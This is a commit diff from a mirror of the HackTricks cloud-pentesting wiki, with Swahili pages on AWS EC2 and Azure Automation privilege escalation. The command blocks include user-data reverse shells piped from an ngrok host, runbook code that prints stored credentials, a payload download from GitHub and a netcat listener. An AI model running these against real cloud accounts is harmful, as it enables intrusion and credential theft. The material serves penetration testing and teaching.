mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-11 12:35:30 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/
This commit is contained in:
Translator
@@ -24,7 +24,7 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
|
||||
```
|
||||
- **Upatikanaji kupitia rev shell katika data ya mtumiaji**
|
||||
|
||||
Unaweza kuendesha mfano mpya ukitumia **data ya mtumiaji** (`--user-data`) ambayo itakutumia **rev shell**. Huhitaji kubaini kundi la usalama kwa njia hii.
|
||||
Unaweza kuendesha mfano mpya ukitumia **data ya mtumiaji** (`--user-data`) ambayo itakutumia **rev shell**. Huhitaji kubainisha kundi la usalama kwa njia hii.
|
||||
```bash
|
||||
echo '#!/bin/bash
|
||||
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
|
||||
@@ -34,17 +34,17 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
|
||||
--count 1 \
|
||||
--user-data "file:///tmp/rev.sh"
|
||||
```
|
||||
Kuwa makini na GuradDuty ukitumia akreditivu za IAM role nje ya instance:
|
||||
Kuwa makini na GuradDuty ukitumia akreditivu za jukumu la IAM nje ya mfano:
|
||||
|
||||
{{#ref}}
|
||||
../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
|
||||
{{#endref}}
|
||||
|
||||
**Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa yoyote EC2 role iliyoambatanishwa na profaili za instance zilizopo.
|
||||
**Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa jukumu lolote la EC2 lililounganishwa na wasifu wa mfano uliopo.
|
||||
|
||||
#### Privesc kwa ECS
|
||||
|
||||
Kwa seti hii ya ruhusa unaweza pia **kuunda instance ya EC2 na kuisajili ndani ya klasta ya ECS**. Kwa njia hii, huduma za ECS **zitakimbia** ndani ya **EC2 instance** ambapo una ufikiaji na kisha unaweza kuingia kwenye huduma hizo (maktaba za docker) na **kuchukua ECS roles zao zilizounganishwa**.
|
||||
Kwa seti hii ya ruhusa unaweza pia **kuunda mfano wa EC2 na kujiandikisha ndani ya klasta ya ECS**. Kwa njia hii, **huduma** za ECS zitakuwa **zinakimbia** ndani ya **mfano wa EC2** ambapo una ufikiaji na kisha unaweza kuingia kwenye huduma hizo (mikononi ya docker) na **kuchukua majukumu yao ya ECS yaliyounganishwa**.
|
||||
```bash
|
||||
aws ec2 run-instances \
|
||||
--image-id ami-07fde2ae86109a2af \
|
||||
@@ -67,7 +67,7 @@ aws-ecs-privesc.md
|
||||
|
||||
Ikiwa huwezi **kuunda mfano mpya** lakini una ruhusa `ecs:RegisterContainerInstance` unaweza kuwa na uwezo wa kujiandikisha mfano ndani ya klasta na kutekeleza shambulio lililozungumziwa.
|
||||
|
||||
**Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa majukumu ya ECS yaliyounganishwa na kazi.
|
||||
**Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa ECS majukumu yaliyounganishwa na kazi.
|
||||
|
||||
### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
|
||||
|
||||
@@ -82,29 +82,27 @@ aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name
|
||||
```
|
||||
Ikiwa **profaili ya mfano ina jukumu** na mshambuliaji **hawezi kuondoa** hiyo, kuna njia nyingine. Anaweza **kupata** **profaili ya mfano isiyo na jukumu** au **kuunda mpya** (`iam:CreateInstanceProfile`), **kuongeza** **jukumu** kwa hiyo **profaili ya mfano** (kama ilivyojadiliwa hapo awali), na **kuunganisha profaili ya mfano** iliyovunjika kwa mfano uliovunjika:
|
||||
|
||||
- Ikiwa mfano **hauna profaili yoyote ya mfano** (`ec2:AssociateIamInstanceProfile`) \*
|
||||
- Ikiwa mfano **hauna profaili yoyote ya mfano** (`ec2:AssociateIamInstanceProfile`)
|
||||
```bash
|
||||
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
|
||||
```
|
||||
**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu tofauti la EC2 (unahitaji kuwa umepata udhibiti wa mfano wa AWS EC2 na ruhusa za ziada au hali maalum ya wasifu wa mfano).
|
||||
**Madhara Yanayoweza Kutokea:** Privesc ya moja kwa moja kwa jukumu tofauti la EC2 (unahitaji kuwa umepata udhibiti wa mfano wa AWS EC2 na ruhusa za ziada au hali maalum ya wasifu wa mfano).
|
||||
|
||||
### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
|
||||
|
||||
Kwa ruhusa hizi inawezekana kubadilisha wasifu wa mfano uliohusishwa na mfano hivyo ikiwa shambulio tayari lilikuwa na ufikiaji wa mfano atakuwa na uwezo wa kuiba akidi za majukumu zaidi ya wasifu wa mfano kwa kubadilisha ule uliohusishwa nao.
|
||||
|
||||
- Ikiwa ina **wasifu wa mfano**, unaweza **kuondoa** wasifu wa mfano (`ec2:DisassociateIamInstanceProfile`) na **kuunganisha** hiyo \*
|
||||
- Ikiwa **ina wasifu wa mfano**, unaweza **kuondoa** wasifu wa mfano (`ec2:DisassociateIamInstanceProfile`) na **kuunganisha**.
|
||||
```bash
|
||||
aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
|
||||
aws ec2 disassociate-iam-instance-profile --association-id <value>
|
||||
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
|
||||
```
|
||||
- au **badilisha** **profaili ya mfano** ya mfano ulioathirika (`ec2:ReplaceIamInstanceProfileAssociation`). \*
|
||||
````
|
||||
- au **badilisha** **profaili ya mfano** ya mfano ulioathirika (`ec2:ReplaceIamInstanceProfileAssociation`).
|
||||
```bash
|
||||
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
|
||||
```
|
||||
````
|
||||
**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu tofauti la EC2 (unahitaji kuwa umepata udhibiti wa mfano wa AWS EC2 na ruhusa za ziada au hali maalum ya wasifu wa mfano).
|
||||
**Madhara Yanayoweza Kutokea:** Privesc ya moja kwa moja kwa jukumu tofauti la EC2 (unahitaji kuwa umepata udhibiti wa mfano wa AWS EC2 na ruhusa za ziada au hali maalum ya wasifu wa mfano).
|
||||
|
||||
### `ec2:RequestSpotInstances`,`iam:PassRole`
|
||||
|
||||
@@ -164,7 +162,7 @@ aws ec2 start-instances --instance-ids $INSTANCE_ID
|
||||
|
||||
### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate`
|
||||
|
||||
Mshambuliaji mwenye ruhusa **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`na `ec2:ModifyLaunchTemplate`** anaweza kuunda **toleo jipya la Template ya Kuanzisha** lenye **rev shell katika** **data ya mtumiaji** na **EC2 IAM Role yoyote juu yake**, kubadilisha toleo la kawaida, na **kikundi chochote cha Autoscaler** **kilichotumia** hiyo **Template ya Kuanzisha** ambayo ime **pangwa** kutumia **toleo jipya** au **la kawaida** itafanya **kurejesha mifano** ikitumia template hiyo na itatekeleza rev shell.
|
||||
Mshambuliaji mwenye ruhusa **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`na `ec2:ModifyLaunchTemplate`** anaweza kuunda **toleo jipya la Template ya Kuanzisha** lenye **rev shell katika** **data ya mtumiaji** na **EC2 IAM Role yoyote juu yake**, kubadilisha toleo la kawaida, na **kikundi chochote cha Autoscaler** **kilichotumia** hiyo **Template ya Kuanzisha** ambayo ime **pangwa** kutumia **toleo jipya** au **toleo la kawaida** itafanya **kurejesha mifano** ikitumia template hiyo na itatekeleza rev shell.
|
||||
```bash
|
||||
REV=$(printf '#!/bin/bash
|
||||
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
|
||||
@@ -178,11 +176,11 @@ aws ec2 modify-launch-template \
|
||||
--launch-template-name bad_template \
|
||||
--default-version 2
|
||||
```
|
||||
**Madhara Yanayoweza Kutokea:** Privesc moja kwa moja kwa jukumu tofauti la EC2.
|
||||
**Madhara Yanayoweza Kutokea:** Privesc ya moja kwa moja kwa jukumu tofauti la EC2.
|
||||
|
||||
### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole`
|
||||
|
||||
Mshambuliaji mwenye ruhusa **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** anaweza **kuunda Mipangilio ya Kuanzisha** yenye **Jukumu la IAM** na **rev shell** ndani ya **data ya mtumiaji**, kisha **kuunda kundi la autoscaling** kutoka kwa mipangilio hiyo na kusubiri rev shell ili **kuiba Jukumu la IAM**.
|
||||
Mshambuliaji mwenye ruhusa **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** anaweza **kuunda Mipangilio ya Uzinduzi** yenye **Jukumu la IAM** na **rev shell** ndani ya **data ya mtumiaji**, kisha **kuunda kundi la autoscaling** kutoka kwa mipangilio hiyo na kusubiri rev shell ili **kuiba Jukumu la IAM**.
|
||||
```bash
|
||||
aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
|
||||
--launch-configuration-name bad_config \
|
||||
@@ -233,11 +231,11 @@ ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-
|
||||
```
|
||||
Hii njia si ya manufaa sana kwa privesc kwani unahitaji kujua jina la mtumiaji na nenosiri ili kuweza kuifanyia shambulio.
|
||||
|
||||
**Madhara Yanayoweza Kutokea:** (Siyo rahisi kuthibitisha) Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotembea.
|
||||
**Madhara Yanayoweza Kutokea:** (Siyo rahisi kuthibitisha) Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayoendesha.
|
||||
|
||||
### `describe-launch-templates`,`describe-launch-template-versions`
|
||||
|
||||
Kwa kuwa templates za uzinduzi zina toleo, mshambuliaji mwenye ruhusa **`ec2:describe-launch-templates`** na **`ec2:describe-launch-template-versions`** anaweza kuzitumia hizi kugundua taarifa nyeti, kama vile akidi zilizopo katika data ya mtumiaji. Ili kufanikisha hili, script ifuatayo inarudiarudia kupitia toleo zote za templates za uzinduzi zinazopatikana:
|
||||
Kwa kuwa templates za uzinduzi zina toleo, mshambuliaji mwenye ruhusa **`ec2:describe-launch-templates`** na **`ec2:describe-launch-template-versions`** anaweza kuzitumia hizi kugundua taarifa nyeti, kama vile akidi zilizopo katika data ya mtumiaji. Ili kufanikisha hili, script ifuatayo inarudiarudia kupitia matoleo yote ya templates za uzinduzi zinazopatikana:
|
||||
```bash
|
||||
for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
|
||||
do
|
||||
@@ -252,9 +250,9 @@ done
|
||||
```
|
||||
Katika amri zilizo hapo juu, ingawa tunabainisha mifumo fulani (`aws_|password|token|api`), unaweza kutumia regex tofauti kutafuta aina nyingine za taarifa nyeti.
|
||||
|
||||
Kukisia tunapata `aws_access_key_id` na `aws_secret_access_key`, tunaweza kutumia akreditivu hizi kujiandikisha kwenye AWS.
|
||||
Ikiwa tutapata `aws_access_key_id` na `aws_secret_access_key`, tunaweza kutumia akreditivu hizi kuthibitisha kwenye AWS.
|
||||
|
||||
**Athari Zinazoweza Kutokea:** Kuinua kibali moja kwa moja kwa mtumiaji wa IAM.
|
||||
**Athari Zinazoweza Kutokea:** Kuongezeka kwa haki moja kwa moja kwa mtumiaji wa IAM.
|
||||
|
||||
## Marejeleo
|
||||
|
||||
|
||||
@@ -0,0 +1,239 @@
|
||||
# Az - Azure Automation Accounts Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Azure Automation Accounts
|
||||
|
||||
Kwa maelezo zaidi angalia:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-automation-accounts.md
|
||||
{{#endref}}
|
||||
|
||||
### `Microsoft.Automation/automationAccounts/jobs/write`, `Microsoft.Automation/automationAccounts/runbooks/draft/write`, `Microsoft.Automation/automationAccounts/jobs/output/read`, `Microsoft.Automation/automationAccounts/runbooks/publish/action` (`Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.Automation/automationAccounts/runbooks/write`)
|
||||
|
||||
Kwa muhtasari ruhusa hizi zinaruhusu **kuunda, kubadilisha na kuendesha Runbooks** katika Akaunti ya Automation ambayo unaweza kutumia **kutekeleza msimbo** katika muktadha wa Akaunti ya Automation na kupandisha hadhi kwa **Identities Zilizoratibiwa** na kuvuja **akili** na **mabadiliko ya siri** yaliyohifadhiwa katika Akaunti ya Automation.
|
||||
|
||||
Ruhusa **`Microsoft.Automation/automationAccounts/runbooks/draft/write`** inaruhusu kubadilisha msimbo wa Runbook katika Akaunti ya Automation kwa kutumia:
|
||||
```bash
|
||||
# Update the runbook content with the provided PowerShell script
|
||||
az automation runbook replace-content --no-wait \
|
||||
--resource-group Resource_Group_1 \
|
||||
--automation-account-name autoaccount1 \
|
||||
--name AzureAutomationTutorialWithIdentity \
|
||||
--content '$creds = Get-AutomationPSCredential -Name "<credential-name>"
|
||||
$runbook_variable = Get-AutomationVariable -Name "<encrypted-variable-name>"
|
||||
$runbook_variable
|
||||
$creds.GetNetworkCredential().username
|
||||
$creds.GetNetworkCredential().password'
|
||||
```
|
||||
Kumbuka jinsi skripti ya awali inaweza kutumika ku **vuja jina la mtumiaji na nenosiri** la akidi na thamani ya **kigeuzi kilichosimbwa** kilichohifadhiwa katika Akaunti ya Automation.
|
||||
|
||||
Ruhusa **`Microsoft.Automation/automationAccounts/runbooks/publish/action`** inaruhusu mtumiaji kuchapisha Runbook katika Akaunti ya Automation ili mabadiliko yafanywe:
|
||||
```bash
|
||||
az automation runbook publish \
|
||||
--resource-group <res-group> \
|
||||
--automation-account-name <account-name> \
|
||||
--name <runbook-name>
|
||||
```
|
||||
Ruhusa **`Microsoft.Automation/automationAccounts/jobs/write`** inaruhusu mtumiaji kuendesha Runbook katika Akaunti ya Automation kwa kutumia:
|
||||
```bash
|
||||
az automation runbook start --automation-account-name <account-name> --resource-group <res-group> --name <runbook-name>
|
||||
```
|
||||
Ruhusa **`Microsoft.Automation/automationAccounts/jobs/output/read`** inaruhusu mtumiaji kusoma matokeo ya kazi katika Akaunti ya Automation kwa kutumia:
|
||||
```bash
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/output?api-version=2023-11-01"
|
||||
```
|
||||
Ikiwa hakuna Runbooks zilizoundwa, au unataka kuunda mpya, utahitaji **permissions `Microsoft.Resources/subscriptions/resourcegroups/read` na `Microsoft.Automation/automationAccounts/runbooks/write`** kufanya hivyo kwa kutumia:
|
||||
```bash
|
||||
az automation runbook create --automation-account-name <account-name> --resource-group <res-group> --name <runbook-name> --type PowerShell
|
||||
```
|
||||
### `Microsoft.Automation/automationAccounts/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
|
||||
|
||||
Ruhusa hii inamruhusu mtumiaji **kuteua kitambulisho cha mtumiaji kilichosimamiwa** kwa Akaunti ya Automation kwa kutumia:
|
||||
```bash
|
||||
az rest --method PATCH \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>?api-version=2020-01-13-preview" \
|
||||
--headers "Content-Type=application/json" \
|
||||
--body '{
|
||||
"identity": {
|
||||
"type": "UserAssigned",
|
||||
"userAssignedIdentities": {
|
||||
"/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>": {}
|
||||
}
|
||||
}
|
||||
}'
|
||||
```
|
||||
### `Microsoft.Automation/automationAccounts/schedules/write`, `Microsoft.Automation/automationAccounts/jobSchedules/write`
|
||||
|
||||
Kwa ruhusa **`Microsoft.Automation/automationAccounts/schedules/write`** inawezekana kuunda Ratiba mpya katika Akaunti ya Automation inayotekelezwa kila dakika 15 (siyo ya siri sana) kwa kutumia amri ifuatayo.
|
||||
|
||||
Kumbuka kwamba **kipindi cha chini kwa ratiba ni dakika 15**, na **wakati wa kuanza wa chini ni dakika 5** katika siku zijazo.
|
||||
```bash
|
||||
## For linux
|
||||
az automation schedule create \
|
||||
--resource-group <RESOURCE_GROUP> \
|
||||
--automation-account-name <AUTOMATION_ACCOUNT_NAME> \
|
||||
--name <SCHEDULE_NAME> \
|
||||
--description "Triggers runbook every minute" \
|
||||
--start-time "$(date -u -d "7 minutes" +%Y-%m-%dT%H:%M:%SZ)" \
|
||||
--frequency Minute \
|
||||
--interval 15
|
||||
|
||||
## Form macOS
|
||||
az automation schedule create \
|
||||
--resource-group <RESOURCE_GROUP> \
|
||||
--automation-account-name <AUTOMATION_ACCOUNT_NAME> \
|
||||
--name <SCHEDULE_NAME> \
|
||||
--description "Triggers runbook every 15 minutes" \
|
||||
--start-time "$(date -u -v+7M +%Y-%m-%dT%H:%M:%SZ)" \
|
||||
--frequency Minute \
|
||||
--interval 15
|
||||
```
|
||||
Kisha, kwa ruhusa **`Microsoft.Automation/automationAccounts/jobSchedules/write`** inawezekana kupeana Scheduler kwa runbook kwa kutumia:
|
||||
```bash
|
||||
az rest --method PUT \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-accounts>/jobSchedules/b510808a-8fdc-4509-a115-12cfc3a2ad0d?api-version=2015-10-31" \
|
||||
--headers "Content-Type=application/json" \
|
||||
--body '{
|
||||
"properties": {
|
||||
"runOn": "",
|
||||
"runbook": {
|
||||
"name": "<runbook-name>"
|
||||
},
|
||||
"schedule": {
|
||||
"name": "<scheduler-name>>"
|
||||
},
|
||||
"parameters": {}
|
||||
}
|
||||
}'
|
||||
```
|
||||
> [!TIP]
|
||||
> Katika mfano uliopita, kitambulisho cha jobchedule kiliacha kama **`b510808a-8fdc-4509-a115-12cfc3a2ad0d` kama mfano** lakini utahitaji kutumia thamani isiyo ya kawaida kuunda ugawaji huu.
|
||||
|
||||
### `Microsoft.Automation/automationAccounts/webhooks/write`
|
||||
|
||||
Kwa ruhusa **`Microsoft.Automation/automationAccounts/webhooks/write`** inawezekana kuunda Webhook mpya kwa Runbook ndani ya Akaunti ya Automation kwa kutumia amri ifuatayo.
|
||||
|
||||
Kumbuka kwamba utahitaji **kuashiria URI ya webhook** pamoja na tokeni ya kutumia.
|
||||
```bash
|
||||
az rest --method PUT \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automantion-account-name>/webhooks/<webhook-name>?api-version=2018-06-30" \
|
||||
--body '{
|
||||
"name": "<webhook-name>",
|
||||
"properties": {
|
||||
"isEnabled": true,
|
||||
"expiryTime": "2026-01-09T20:03:30.291Z",
|
||||
"parameters": {},
|
||||
"runOn": null,
|
||||
"runbook": {
|
||||
"name": "<runbook-name>"
|
||||
},
|
||||
"uri": "https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=Ts5WmbKk0zcuA8PEUD4pr%2f6SM0NWydiCDqCqS1IdzIU%3d"
|
||||
}
|
||||
}'
|
||||
|
||||
# Then, to call the runbook using the webhook
|
||||
curl -X POST "https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=Ts5WmbKk0zcuA8PEUD4pr%2f6SM0NWydiCDqCqS1IdzIU%3d" \
|
||||
-H "Content-Length: 0"
|
||||
```
|
||||
### `Microsoft.Automation/automationAccounts/runbooks/draft/write`
|
||||
|
||||
Kwa ruhusa tu `Microsoft.Automation/automationAccounts/runbooks/draft/write` inawezekana **kusaidia kuboresha msimbo wa Runbook** bila kuuchapisha na kuufanya ukimbie kwa kutumia amri zifuatazo.
|
||||
```bash
|
||||
# Update the runbook content with the provided PowerShell script
|
||||
az automation runbook replace-content --no-wait \
|
||||
--resource-group Resource_Group_1 \
|
||||
--automation-account-name autoaccount1 \
|
||||
--name AzureAutomationTutorialWithIdentity \
|
||||
--content 'echo "Hello World"'
|
||||
|
||||
# Run the unpublished code
|
||||
az rest \
|
||||
--method PUT \
|
||||
--url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Automation/automationAccounts/autoaccount1/runbooks/AzureAutomationTutorialWithIdentity/draft/testJob?api-version=2023-05-15-preview" \
|
||||
--headers "Content-Type=application/json" \
|
||||
--body '{
|
||||
"parameters": {},
|
||||
"runOn": "",
|
||||
"runtimeEnvironment": "PowerShell-5.1"
|
||||
}'
|
||||
|
||||
# Get the output (a different permission is needed here, but you could get a revershell or exfiltrate the token to avoid needing this permission)
|
||||
az rest --method get --url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Automation/automationAccounts/autoaccount1/runbooks/AzureAutomationTutorialWithIdentity/draft/testJob/streams?api-version=2019-06-01"
|
||||
```
|
||||
### `Microsoft.Automation/automationAccounts/sourceControls/write`, (`Microsoft.Automation/automationAccounts/sourceControls/read`)
|
||||
|
||||
Ruhusa hii inamruhusu mtumiaji **kuunda udhibiti wa chanzo** kwa Akaunti ya Automation kwa kutumia amri kama ifuatavyo (hii inatumia Github kama mfano):
|
||||
```bash
|
||||
az automation source-control create \
|
||||
--resource-group <res-group> \
|
||||
--automation-account-name <automation-account-name> \
|
||||
--name RemoteGithub \
|
||||
--repo-url https://github.com/carlospolop/gh-runbooks.git \
|
||||
--branch main \
|
||||
--folder-path /runbooks/ \
|
||||
--publish-runbook true \
|
||||
--auto-sync \
|
||||
--source-type GitHub \
|
||||
--token-type PersonalAccessToken \
|
||||
--access-token github_pat_11AEDCVZ<rest-of-the-token>
|
||||
```
|
||||
Hii itafanya kuagiza kiotomatiki runbooks kutoka kwa hazina ya Github kwenye Akaunti ya Automation na kwa ruhusa nyingine za kuanza kuzitekeleza itakuwa **inawezekana kupandisha mamlaka**.
|
||||
|
||||
Zaidi ya hayo, kumbuka kwamba ili kudhibiti chanzo kufanya kazi katika Akaunti za Automation lazima iwe na utambulisho ulio na usimamizi wenye jukumu la **`Contributor`** na ikiwa ni utambulisho wa mtumiaji ulio na usimamizi hii inaweza pia kuwekwa kwa kuweka katika variable **`AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID`** **client id** ya utambulisho wa mtumiaji wa kusimamia kutumia.
|
||||
|
||||
> [!TIP]
|
||||
> Kumbuka kwamba siwezi kubadilisha URL ya repo ya chanzo cha udhibiti mara tu inapoanzishwa.
|
||||
|
||||
### Mazingira ya Uendeshaji ya Kijadi
|
||||
|
||||
Ikiwa akaunti ya automation inatumia mazingira ya uendeshaji ya kijadi, inaweza kuwa inawezekana kubadilisha kifurushi cha kijadi cha uendeshaji na baadhi ya msimbo mbaya (kama **backdoor**). Kwa njia hii, kila wakati runbook inayotumia mazingira hayo ya kijadi inatekelezwa na kupakia kifurushi hicho cha kijadi, msimbo mbaya utaanzishwa.
|
||||
|
||||
### Kuathiri Usanidi wa Jimbo
|
||||
|
||||
**Angalia chapisho kamili katika:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
|
||||
|
||||
- Hatua ya 1 — Unda Faili
|
||||
|
||||
**Faili Zinazohitajika:** Skripti mbili za PowerShell zinahitajika:
|
||||
1. `reverse_shell_config.ps1`: Faili ya Usanidi wa Jimbo Linalotakiwa (DSC) inayopata na kutekeleza payload. Inapatikana kutoka [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
|
||||
2. `push_reverse_shell_config.ps1`: Skripti ya kuchapisha usanidi kwenye VM, inapatikana kwenye [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
|
||||
|
||||
**Uboreshaji:** Variables na parameta katika faili hizi zinapaswa kuboreshwa kwa mazingira maalum ya mtumiaji, ikiwa ni pamoja na majina ya rasilimali, njia za faili, na vitambulisho vya seva/payload.
|
||||
|
||||
- Hatua ya 2 — Zip Faili la Usanidi
|
||||
|
||||
Faili `reverse_shell_config.ps1` inashirikiwa katika faili la `.zip`, ikifanya iwe tayari kwa uhamasishaji kwenye Akaunti ya Hifadhi ya Azure.
|
||||
```powershell
|
||||
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
|
||||
```
|
||||
- Step 3 — Set Storage Context & Upload
|
||||
|
||||
Faili la usanidi lililoshonwa linawekwa kwenye kontena la Azure Storage lililowekwa awali, azure-pentest, kwa kutumia cmdlet ya Azure Set-AzStorageBlobContent.
|
||||
```powershell
|
||||
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
|
||||
```
|
||||
- Step 4 — Prep Kali Box
|
||||
|
||||
Seva ya Kali inashusha mzigo wa RevPS.ps1 kutoka kwenye hifadhi ya GitHub.
|
||||
```bash
|
||||
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
|
||||
```
|
||||
Script imehaririwa ili kubaini VM ya Windows inayolengwa na bandari ya shell ya kurudi.
|
||||
|
||||
- Hatua ya 5 — Chapisha Faili la Mipangilio
|
||||
|
||||
Faili la mipangilio linafanywa kazi, na kusababisha script ya shell ya kurudi kupelekwa kwenye eneo lililotajwa kwenye VM ya Windows.
|
||||
|
||||
- Hatua ya 6 — Kuweka Payload na Kuanzisha Listener
|
||||
|
||||
Python SimpleHTTPServer inaanzishwa ili kuhifadhi payload, pamoja na listener ya Netcat kukamata muunganisho unaokuja.
|
||||
```bash
|
||||
sudo python -m SimpleHTTPServer 80
|
||||
sudo nc -nlvp 443
|
||||
```
|
||||
Kazi iliyoandaliwa inatekeleza payload, ikipata haki za kiwango cha SYSTEM.
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
@@ -1,170 +0,0 @@
|
||||
# Az - Automation Account
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Basic Information
|
||||
|
||||
[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation inatoa huduma ya automation ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usanidi inayounga mkono usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automation ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti.
|
||||
|
||||
Hizi ni kama "**scheduled tasks**" katika Azure ambazo zitakuruhusu kutekeleza mambo (vitendo au hata scripts) ili **kusimamia**, kuangalia na kuunda **mazingira ya Azure**.
|
||||
|
||||
### Run As Account
|
||||
|
||||
Wakati **Run as Account** inatumika, inaunda **application** ya Azure AD yenye cheti kilichojisaini, inaunda **service principal** na inatoa jukumu la **Contributor** kwa akaunti katika **subscription** ya sasa (privileges nyingi).\
|
||||
Microsoft inapendekeza kutumia **Managed Identity** kwa Akaunti ya Automation.
|
||||
|
||||
> [!WARNING]
|
||||
> Hii itakuwa **ondolewa tarehe Septemba 30, 2023 na kubadilishwa kwa Managed Identities.**
|
||||
|
||||
## Runbooks & Jobs
|
||||
|
||||
**Runbooks** zinakuruhusu **kutekeleza PowerShell** ya kawaida. Hii inaweza **kutumiwa vibaya na mshambuliaji** kuiba ruhusa za **principal** iliyoambatanishwa (ikiwa ipo).\
|
||||
Katika **code** ya **Runbooks** unaweza pia kupata **sensitive info** (kama vile creds).
|
||||
|
||||
Ikiwa unaweza **kusoma** **jobs**, fanya hivyo kwani **zinashikilia** **output** ya run (potenshiali **sensitive info**).
|
||||
|
||||
Nenda kwa `Automation Accounts` --> `<Select Automation Account>` --> `Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections`
|
||||
|
||||
### Hybrid Worker
|
||||
|
||||
Runbook inaweza kutekelezwa katika **konteina ndani ya Azure** au katika **Hybrid Worker** (mashine isiyo ya azure).\
|
||||
**Log Analytics Agent** inapelekwa kwenye VM ili kuisajili kama mfanyakazi wa hybrid.\
|
||||
Majukumu ya mfanyakazi wa hybrid yanakimbia kama **SYSTEM** kwenye Windows na akaunti ya **nxautomation** kwenye Linux.\
|
||||
Kila Hybrid Worker inasajiliwa katika **Hybrid Worker Group**.
|
||||
|
||||
Hivyo, ikiwa unaweza kuchagua kutekeleza **Runbook** katika **Windows Hybrid Worker**, utaweza kutekeleza **amri za kawaida** ndani ya mashine ya nje kama **System** (mbinu nzuri ya pivot).
|
||||
|
||||
## Compromise State Configuration (SC)
|
||||
|
||||
